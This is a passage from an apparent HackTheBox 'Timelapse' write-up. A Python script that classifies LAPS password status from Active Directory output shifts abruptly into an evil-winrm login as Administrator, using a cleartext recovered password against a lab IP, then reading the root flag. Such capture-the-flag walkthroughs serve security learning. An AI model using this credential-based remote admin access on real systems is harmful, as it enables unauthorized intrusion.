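FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_datetime(value):
    """ms-Mcs-AdmPwdExpirationTime is a Windows FILETIME: 100 ns ticks since 1601-01-01 UTC."""
    return FILETIME_EPOCH + timedelta(microseconds=int(value) // 10)


def parse_format_list(text):
    """Split PowerShell Format-List output ('Name : Value' lines, blank line between objects)."""
    records, current = [], {}
    for line in text.splitlines():
        if not line.strip():
            if current:
                records.append(current)
                current = {}
            continue
        key, _, value = line.partition(":")
        current[key.strip()] = value.strip()
    if current:
        records.append(current)
    return records


def audit_laps(text, as_of=None):
    """Per computer: 'managed' (LAPS password present and current), 'expired' (expiry has
    passed without rotation) or 'unmanaged' (no ms-Mcs-AdmPwd value readable at all).
    as_of is an ISO-8601 UTC timestamp; it defaults to the current time."""
    now = (datetime.strptime(as_of, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
           if as_of else datetime.now(timezone.utc))
    report = {}
    for rec in parse_format_list(text):
        if rec.get("ms-Mcs-AdmPwd"):
            expires = filetime_to_datetime(rec["ms-Mcs-AdmPwdExpirationTime"])
            report[rec["Name"]] = {
                "status": "expired" if expires < now else "managed",
                "expires": expires.strftime("%Y-%m-%dT%H:%M:%SZ"),
            }
        else:
            report[rec["Name"]] = {"status": "unmanaged", "expires": None}
    return report


if __name__ == "__main__":
    for name, info in audit_laps(AD_OUTPUT, as_of="2022-07-22T22:00:00Z").items():
        print(f"{name:6} {info['status']:10} {info['expires'] or '-'}")
```

Against the constructed sample, taken as of the day of the scan (2022-07-22), DC01 comes out as managed with an expiry of 2022-07-27T21:26:08Z, and DB01, WEB01 and DEV01 as unmanaged; run with a later cut-off, DC01 flips to expired. The page's output alone does not say whether those three servers lack a LAPS client or simply have no password set yet, and that gap, together with passwords whose expiry has passed without rotation, is exactly what a periodic audit of this kind is meant to surface.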
So we run the command and obtain the local administrator's password; let's try logging in with evil-winrm.
```
$ ruby /home/asdf/github/evil-winrm/evil-winrm.rb -S -u Administrator -p "S6QY1oDB00ZB8.)8+Cc#]4m1" -i 10.10.11.152

Evil-WinRM shell v3.3

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Warning: SSL enabled

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
timelapse\administrator
```
Getting the root flag
We are admin now, so let's get our flag. To our surprise it is not in the usual place; we check each user's home directory and in this case it is on the desktop of the TRX user, not the Administrator user's.
```
*Evil-WinRM* PS C:\Users\TRX> ls desktop

    Directory: C:\Users\TRX\desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---         7/22/2022   2:26 PM             34 root.txt

*Evil-WinRM* PS C:\Users\TRX> type desktop/root.txt
7xxxxxxxxxxxxxxxxxxxxxxxxxxxxb
*Evil-WinRM* PS C:\Users\TRX>
```
And with that we have our root flag, completing this machine and earning our points.
If you are a HackTheBox user and liked my writeup, please give me respect at the following link